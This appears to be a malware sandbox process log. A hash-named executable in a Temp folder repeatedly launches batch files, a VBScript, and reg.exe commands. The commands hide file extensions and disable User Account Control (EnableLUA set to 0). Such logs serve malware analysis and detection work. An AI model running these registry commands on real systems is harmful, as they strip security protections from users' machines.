C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaYoswIM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JMowsggs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zYsAgwYA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lEAEwwYs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pqUcgswE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yEEgkYMc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YaEEMMYk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WwwQcQYw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FEcoEoAc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIwAgwIk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\psEgYkUs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TMcMoQgE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gGUAEgoU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oWMEcQMs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QOwUgksk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vMgQAAwo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DAUYAMsg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZocsMwwc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ueEEwEEA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KEsUgwYc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QIgYEYYI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
